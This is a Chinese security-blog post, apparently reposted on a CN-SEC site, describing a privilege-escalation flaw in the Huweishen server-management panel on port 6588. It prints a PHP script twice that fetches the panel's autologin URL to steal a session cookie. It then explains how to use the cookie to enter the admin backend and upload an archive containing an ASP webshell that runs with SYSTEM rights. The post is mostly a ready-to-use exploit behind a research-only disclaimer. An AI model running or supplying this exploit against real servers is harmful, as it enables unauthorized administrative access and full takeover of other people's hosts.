护卫神6588端口提权漏洞

颓废
颓废
颓废
441
文章
0
评论
2019年5月19日09:03:34评论894 views字数 586阅读1分57秒阅读模式
摘要

可执行脚本 <?php function httpGet() { $url = 'https://www.0dayhack.com:6588/admin/index.asp?f=autologin'; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, TRUE); //表示需要response header curl_setopt($ch, CURLOPT_NOBODY, TRUE); //表示需要response body curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, FALSE); curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE); curl_setopt($ch, CURLOPT_TIMEOUT, 120); $result = curl_exec($ch); return $result; } echo httpGet(); echo asd; ?> 上传脚本访问获取cookie,修改cookie访问:6588/admin/index.asp成功进入后台

利用支持解压包 解压包的内容是asp马 以护卫神的system权限达到提权

利用条件:

shell权限

可执行脚本 

<?php function httpGet() {     $url = 'https://www.0dayhack.com:6588/admin/index.asp?f=autologin';     $ch = curl_init();     curl_setopt($ch, CURLOPT_URL, $url);     curl_setopt($ch, CURLOPT_HEADER, TRUE);    //表示需要response header     curl_setopt($ch, CURLOPT_NOBODY, TRUE); //表示需要response body     curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);     curl_setopt($ch, CURLOPT_FOLLOWLOCATION, FALSE);     curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);     curl_setopt($ch, CURLOPT_TIMEOUT, 120);     $result = curl_exec($ch);     return $result; } echo httpGet(); echo asd; ?>

上传脚本访问获取cookie,修改cookie访问:6588/admin/index.asp成功进入后台

利用支持解压包 解压包的内容是asp马 以护卫神的system权限达到提权

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2019年5月19日09:03:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   护卫神6588端口提权漏洞https://cn-sec.com/archives/68067.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息